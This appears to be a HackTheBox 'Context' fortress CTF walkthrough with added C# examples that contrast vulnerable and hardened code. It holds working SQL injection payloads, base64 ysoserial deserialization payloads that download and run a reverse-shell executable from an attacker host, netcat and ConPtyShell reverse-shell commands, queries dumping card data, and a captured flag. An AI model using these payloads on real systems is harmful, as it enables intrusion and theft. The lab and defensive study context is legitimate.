
HackTheBox-Context

10/05/2024

Context Fortress Write-up


Introduction
This fortress was a bit of a nightmare for me, honestly. I would rate it hard and definitely not beginner friendly. It involves fun challenges and I learned a lot from it, even though it took me a while to actually finish it. The main reason for writing this is that it helps my learning process, and it's always a good habit to take notes. I will also be providing links and everything you need.

● But we have SSL!?
● That shouldn't be there...
● Have we met before?
● Is it a bird? Is it a plane?
● This looks bad!
● It's not a backdoor, it's a feature
● Key to the castle

Enumeration phase
● But we have SSL!?

nmap -p- -sCV --min-rate=7000 10.13.37.12 -oN scan

Port 5985 is known for Windows RDP, which means we can use it later with evil-winrm.


Checking the scan results for further information, there is an MSSQL server running on port 1433 and a teignton.htb domain is revealed.


Moving on, I used feroxbuster to find hidden directories and found an interesting one, "/owa", which is OWA, the Outlook web service.

But let's not get ahead of ourselves just yet. As per usual I check the website, where the first flag is in the source code of the page https://10.13.37.12/Home/Staff

Using those creds I entered https://10.13.37.12/Admin

And went to https://10.13.37.12/Admin/Management

● That shouldn't be there...


I tried a bunch of XSS payloads and tools; nothing really worked, so I went on to try SQLi. I tried a bunch of stuff, although I didn't really use sqlmap, I did it manually. These were the payloads that worked:

'+(select db_name() as CurrentDatabaseName)+'
'+(select db_name())+'

And it revealed a webapp database:

And this returned the first username:

'+(select top 1 username from users order by 1)+'

Next mission is to retrieve the password:

'+(select top 1 password from users order by username)+'


There is an admin user in the database; you can try to look for it yourself. The DB also contains a flag, which you can retrieve with this command, and I will be explaining it:

'+(select password from users order by username offset 2 rows fetch next 1 rows only)+'


1. order by username: This part of the command orders the result set of the subquery by the username column. It sorts the rows in ascending order based on the username.
2. offset 2 rows: This part of the command skips the first 2 rows of the sorted result set. It means that it starts counting from the third row.
3. fetch next 1 rows only: This part of the command specifies that only 1 row should be returned after skipping the offset rows.

Flag:
CONTEXT{d0_it_st0p_it_br34k_it_f1x_it}
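To understand why the '+(select ...)+' payloads above work at all, it helps to see the server-side pattern that makes them possible beside its parameterized form. The following is an added C# example written for this write-up; it is not the fortress application's code. The staff table, its column names and the search method are assumptions, and it targets the classic System.Data.SqlClient API of the .NET Framework:

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

public static class StaffSearch
{
    // VULNERABLE PATTERN (assumed shape of the original bug, not the app's real code).
    // The search term is pasted straight into the statement text. Because T-SQL's
    // "+" operator concatenates strings, an input such as  '+(select db_name())+'
    // closes the literal, appends the result of an arbitrary subquery and reopens
    // the literal, which is exactly why database contents were echoed back above.
    public static string BuildUnsafeQuery(string searchTerm)
    {
        return "SELECT id, name, department FROM staff WHERE name LIKE '%" + searchTerm + "%'";
    }

    // HARDENED PATTERN. The term travels as a typed parameter, so the statement
    // text never changes: quotes, "+" and subqueries inside the value are just
    // characters to be matched, never SQL to be executed.
    public static DataTable SearchSafe(SqlConnection conn, string searchTerm)
    {
        const string sql = "SELECT id, name, department FROM staff WHERE name LIKE @pattern";

        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.CommandType = CommandType.Text;

            // Escape the LIKE wildcards so user-supplied % and _ match literally;
            // SQL Server treats [..] as an escape bracket in LIKE patterns.
            string escaped = searchTerm
                .Replace("[", "[[]")
                .Replace("%", "[%]")
                .Replace("_", "[_]");

            cmd.Parameters.Add("@pattern", SqlDbType.NVarChar, 200).Value = "%" + escaped + "%";

            var table = new DataTable();
            using (SqlDataReader reader = cmd.ExecuteReader())
            {
                table.Load(reader);
            }
            return table;
        }
    }
}
```

Two things in the write-up reinforce why the parameterized version matters: the injected subqueries could read the users table, including the password column, and later the same login could reach card_details through the [web\clients] linked server. Parameterization closes the injection itself; giving the web application's SQL login only the permissions it needs on its own database (and no linked-server access) is what limits the damage when some other bug slips through.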

Outlook Enum


After looking around for some time I figured out that I could change mailboxes to only one other user, and found a conversation between Jay and his father.


So I download the Zip file and start looking for vulnerabilities, and after a while I come across the Views/_ViewStart.cshtml file. What caught my eye was this:

And I remembered a challenge I played a while ago; it was a pickle deserialization vulnerability, so I started researching. What this file does is send the Profile cookie to the server and serialize it (serializing means converting data into a stream of bytes; this is a great and simple article that explains it: https://hazelcast.com/glossary/serialization/).

So the idea here is to get a reverse shell through the Profile cookie. For that we need to use ysoserial.exe, a famous tool for generating payloads that exploit unsafe .NET object deserialization, so we search for JavaScriptSerializer. And we must convert it to base64 to match how the data is being manipulated by the script.

Moving on, if you want to use ysoserial.exe on a Linux machine you have to install mono or wine and run any .NET script you want.
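The reason a base64 cookie can turn into code execution is the way the server configures JavaScriptSerializer. The following is an added C# example for this write-up, not code from the fortress application: it shows the configuration that makes a Profile cookie dangerous beside a hardened version. The UserProfile class, the cookie size limit and the HMAC key handling are assumptions; the serializer API is the .NET Framework's System.Web.Extensions one that ysoserial's JavaScriptSerializer gadgets target:

```csharp
using System;
using System.Security.Cryptography;
using System.Text;
using System.Web.Script.Serialization;   // System.Web.Extensions.dll (.NET Framework)

// Hypothetical profile type; the fortress app's real class name is not on the page.
public class UserProfile
{
    public string DisplayName { get; set; }
    public string Theme { get; set; }
}

public static class ProfileCookie
{
    // VULNERABLE PATTERN. Supplying a SimpleTypeResolver makes the serializer
    // honour the "__type" member of attacker-controlled JSON, so the cookie, not
    // the code, decides which .NET type gets instantiated and populated. This is
    // the precondition the JavaScriptSerializer payloads in ysoserial rely on.
    public static object ParseUnsafe(string cookieValue)
    {
        string json = Encoding.UTF8.GetString(Convert.FromBase64String(cookieValue));
        var serializer = new JavaScriptSerializer(new SimpleTypeResolver());
        return serializer.DeserializeObject(json);
    }

    // HARDENED PATTERN. No type resolver (the default is null, so "__type" is
    // ignored), a fixed concrete target type, a size cap, and every parse
    // failure is treated as "no profile" instead of an exception page.
    public static UserProfile ParseSafe(string cookieValue)
    {
        if (string.IsNullOrEmpty(cookieValue) || cookieValue.Length > 4096)
            return null;

        byte[] raw;
        try { raw = Convert.FromBase64String(cookieValue); }
        catch (FormatException) { return null; }

        string json = Encoding.UTF8.GetString(raw);
        var serializer = new JavaScriptSerializer();
        try
        {
            return serializer.Deserialize<UserProfile>(json);
        }
        catch (ArgumentException) { return null; }          // malformed JSON
        catch (InvalidOperationException) { return null; }  // shape does not fit UserProfile
    }

    // STRONGER STILL: authenticate the cookie before parsing anything, so a value
    // the server never issued is rejected outright. The key is assumed to come
    // from protected server-side configuration.
    public static bool HasValidMac(string cookieValue, string macBase64, byte[] key)
    {
        byte[] presented;
        try { presented = Convert.FromBase64String(macBase64); }
        catch (FormatException) { return false; }

        byte[] expected;
        using (var hmac = new HMACSHA256(key))
            expected = hmac.ComputeHash(Encoding.UTF8.GetBytes(cookieValue));

        // Constant-time comparison so the check does not leak how many bytes matched.
        if (presented.Length != expected.Length) return false;
        int diff = 0;
        for (int i = 0; i < expected.Length; i++) diff |= expected[i] ^ presented[i];
        return diff == 0;
    }

    // Issuing side: serialize a trusted server-side object and attach its MAC.
    public static string Issue(UserProfile profile, byte[] key, out string macBase64)
    {
        string json = new JavaScriptSerializer().Serialize(profile);
        string value = Convert.ToBase64String(Encoding.UTF8.GetBytes(json));
        using (var hmac = new HMACSHA256(key))
            macBase64 = Convert.ToBase64String(hmac.ComputeHash(Encoding.UTF8.GetBytes(value)));
        return value;
    }
}
```

The order of checks is deliberate: HasValidMac runs first and costs nothing but a hash, ParseSafe only ever produces a UserProfile, and neither path lets the client name a type. When reviewing a .NET code base for this class of bug, the thing to grep for is any JavaScriptSerializer constructed with a type resolver, or any deserializer whose target type is object.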

And look for JavaScriptSerializer

Now we need to craft our payload like so :


Result :
ewogICAgJ19fdHlwZSc6J1N5c3RlbS5XaW5kb3dzLkRhd
GEuT2JqZWN0RGF0YVByb3ZpZGVyLCBQcmVzZW50Y
XRpb25GcmFtZXdvcmssIFZlcnNpb249NC4wLjAuMCwgQ
3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zM
WJmMzg1NmFkMzY0ZTM1JywgCiAgICAnTWV0aG9kTm
FtZSc6J1N0YXJ0JywKICAgICdPYmplY3RJbnN0YW5jZS
c6ewogICAgICAgICdfX3R5cGUnOidTeXN0ZW0uRGlhZ2
5vc3RpY3MuUHJvY2VzcywgU3lzdGVtLCBWZXJzaW9uP
TQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGlj
S2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OScsCiAgICA
gICAgJ1N0YXJ0SW5mbyc6IHsKICAgICAgICAgICAgJ19f
dHlwZSc6J1N5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzU
3RhcnRJbmZvLCBTeXN0ZW0sIFZlcnNpb249NC4wLjAu
MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb
2tlbj1iNzdhNWM1NjE5MzRlMDg5JywKICAgICAgICAgICA
gJ0ZpbGVOYW1lJzonY21kJywgJ0FyZ3VtZW50cyc6Jy9jI
GNtZCAvYyBjdXJsIDEwLjEwLjE2LjU6ODAwL3Jldi5leGU
gLW8gQzpcXFByb2dyYW1EYXRhXFxyZXYuZXhlJwogIC
AgICAgIH0KICAgIH0KfQ==

But before that we need to craft our reverse shell exe


Now start an HTTP server with Python on the port you specified before and refresh the page:


Now we need to set up the listener on port 4444 and wait for the connection, but before that we need to use ysoserial.exe again to execute rev.exe.

The base64:
ewogICAgJ19fdHlwZSc6J1N5c3RlbS5XaW5kb3dzLkRhd
GEuT2JqZWN0RGF0YVByb3ZpZGVyLCBQcmVzZW50Y
XRpb25GcmFtZXdvcmssIFZlcnNpb249NC4wLjAuMCwgQ
3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zM
WJmMzg1NmFkMzY0ZTM1JywgCiAgICAnTWV0aG9kTm
FtZSc6J1N0YXJ0JywKICAgICdPYmplY3RJbnN0YW5jZS
c6ewogICAgICAgICdfX3R5cGUnOidTeXN0ZW0uRGlhZ2
5vc3RpY3MuUHJvY2VzcywgU3lzdGVtLCBWZXJzaW9uP
TQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGlj
S2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OScsCiAgICA
gICAgJ1N0YXJ0SW5mbyc6IHsKICAgICAgICAgICAgJ19f
dHlwZSc6J1N5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzU
3RhcnRJbmZvLCBTeXN0ZW0sIFZlcnNpb249NC4wLjAu
MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb
2tlbj1iNzdhNWM1NjE5MzRlMDg5JywKICAgICAgICAgICA
gJ0ZpbGVOYW1lJzonY21kJywgJ0FyZ3VtZW50cyc6Jy9jI
GNtZCAvYyBDOlxcUHJvZ3JhbURhdGFcXHJldi5leGUnCi
AgICAgICAgfQogICAgfQp9


And now inject it into the Profile cookie again after you set up the listener.

BOOM!!
Next flag is

Next go to logs/webdb and cat the log_13.trc file; there we will be finding Karl's creds.


Moving on I logged

Found this:

Apparently Karl has some database privs, so I try to log in using impacket-mssqlclient.


I didn't find anything really worth looking at in this database, so I tried to look around; webapp wasn't the only servlet.

So I tried to access Clients.


Card_details returned a massive amount of data, so I exported it to a file. Enter this command to access the data:

SELECT * FROM [web\clients].[clients].[dbo].[card_details];

After further searching in assembly_files, use this command to retrieve the data:

select cast (N'' as xml).value('xs:base64Binary(sql:column("content"))','varchar(max)') as data from openquery([web\clients], 'select * from clients.sys.assembly_files;') order by content desc offset 1 rows;

1. Xml Value Method:
   ○ cast (N'' as xml).value('xs:base64Binary(sql:column("content"))','varchar(max)') as data: This part of the command converts the content column data, which is assumed to be in Base64-encoded format, from the XML data type to a varchar(max) data type.
   ○ The cast (N'' as xml) part creates an empty XML instance.
   ○ The .value() method is applied to this XML instance. It extracts the value of the content column, assumes it's in Base64 format (xs:base64Binary), and converts it to a string (varchar(max)).

Put that data in a file after you convert it from base64.

After that we are going to need dnSpy to decompile it, although you will be needing wine for that.

Search the file until you find Jay's creds.


And here is where evil-winrm comes in handy.

In the documents I found WindowsService.exe, which basically hosts a TCP server on port 7734. After decompiling it in dnSpy, here are the results:

There are loads of interesting functions like CheckClientCommand() and CheckClientPassword(), and the password func:


Anywho, for us, in PowerShell type:

(Get-Date).ToString("yyyy-MM-dd") + "-thisisleet"

for the password.

Then upload netcat to the Windows machine, although before that we must upgrade the PowerShell to a fully stable shell, otherwise we won't really be able to use nc64.exe. For that I am going to use ConPtyShell:

git clone https://github.com/antonioCoco/ConPtyShell.git


Enter the directory and compile the ConPtyShell.cs C# file to an executable. After loads of trial and error I found that I should only compile it with .NET v4.8, because the .NET Framework 4.8 is based on .NET Standard 2.0. Therefore you can specify the -sdk option with a value of 2.0 to target .NET Standard 2.0, which is compatible with .NET Framework 4.8.

I asked ChatGPT to check the .NET version on the target machine and it gave me this command:

Get-ItemPropertyValue 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full' -Name Release

It returned 528049, which correlates to v4.8: 528040.

That's why when compiling it with mcs we should use this specific command for it to work:

Upload this exe to the remote machine and type this in your terminal:


Attacker Machine:
stty raw -echo; (stty size; cat) | nc -lvnp 443

Target Machine
.\ConPtyShell.exe 10.10.16.5 443

Got it. Now the next step is to nc to port 7734 and get a reverse shell session; set up a new nc listener on your attack box.

And we get a connection as andy.


From what I heard, because honestly I didn't notice it by myself, a way to escalate privs is by Group Policy Objects: https://www.mindpointgroup.com/blog/privilege-escalation-via-group-policy-preferences-gpp

That article explains it, but not in a very direct way. Anywho, let's get started.


Now we need SharpGPOAbuse for the next step.

And that's it for the last flag: now that we have given jay.teignton local admin privs, we use evil-winrm once more.

And that's it for this fortress. It was really fun to play; hope you enjoy it as well.
